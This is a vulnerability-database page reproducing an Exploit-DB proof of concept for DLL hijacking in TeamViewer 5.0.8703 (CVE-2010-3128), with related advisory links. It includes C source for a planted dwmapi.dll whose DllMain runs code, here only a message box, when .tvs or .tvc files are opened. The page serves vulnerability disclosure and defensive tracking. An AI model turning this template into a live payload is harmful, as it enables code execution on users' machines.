Lucene search
+L

TeamViewer 5.0.8703 - 'dwmapi.dll' DLL Hijacking

🗓️ 24 Aug 2010 00:00:00Reported by Glafkos CharalambousType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 61 Views

TeamViewer 5.0.8703 DLL Hijacking exploit using 'dwmapi.dll

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2010-3128
26 Aug 201018:00
cve
cvelist
Cvelist
CVE-2010-3128
26 Aug 201018:00
cvelist
euvd
EUVD
EUVD-2010-3128
7 Oct 202500:30
euvd
ics
ICS
Omron CX-Supervisor
5 Nov 201900:00
ics
kaspersky
Kaspersky
KLA10361 ACE vulnerability in TeamViewer
26 Aug 201000:00
kaspersky
nvd
NVD
CVE-2010-3128
26 Aug 201018:36
nvd
openvas
OpenVAS
TeamViewer File Opening Insecure Library Loading Vulnerability
8 Sep 201000:00
openvas
openvas
OpenVAS
TeamViewer File Opening Insecure Library Loading Vulnerability
8 Sep 201000:00
openvas
prion
Prion
Design/Logic Flaw
26 Aug 201018:36
prion
nessus
Tenable Nessus
TeamViewer Path Subversion Arbitrary DLL Injection Code Execution
10 Sep 201000:00
nessus
/*
Exploit Title: TeamViewer <= 5.0.8703 DLL Hijacking Exploit (dwmapi.dll)
Date: August 25, 2010
Author: Glafkos Charalambous (glafkos[@]astalavista[dot]com)
Version: 5.0.8703
Tested on: Windows XP SP3 En
Vulnerable extensions: .tvs .tvc
Greetz: Astalavista, OffSEC, Exploit-DB
*/

#include <windows.h>
#define DllExport __declspec (dllexport)

BOOL WINAPI  DllMain (
            HANDLE    hinstDLL,
            DWORD     fdwReason,
            LPVOID    lpvReserved)
{
  dll_hijack();
  return 0;
}

int dll_hijack()
{
  MessageBox(0, "TeamViewer DLL Hijacking!", "DLL Message", MB_OK);
  return 0;
}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

25 Aug 2010 00:00Current
8.4High risk
Vulners AI Score8.4
CVSS 29.3
EPSS0.08361
61